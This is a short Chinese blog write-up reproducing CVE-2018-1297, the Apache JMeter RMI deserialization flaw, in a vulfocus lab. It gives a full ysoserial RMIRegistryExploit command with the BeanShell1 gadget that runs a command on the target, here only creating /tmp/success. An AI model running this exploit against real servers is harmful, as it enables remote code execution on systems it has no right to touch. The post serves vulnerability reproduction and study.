Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。
环境:vulfocus一键启动
攻击方式
java -cp /Users/lfj/Documents/kali/data/data/tools/Apache-Shiro/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 144.76.229.248 24330 BeanShell1 'touch /tmp/success'
登陆到漏洞测试环境,查看结果
大概就这些……
声明:
本文采用
BY-NC-SA
协议进行授权,如无注明均为原创,转载请注明转自
运维那些事
本文地址: Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
本文地址: Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
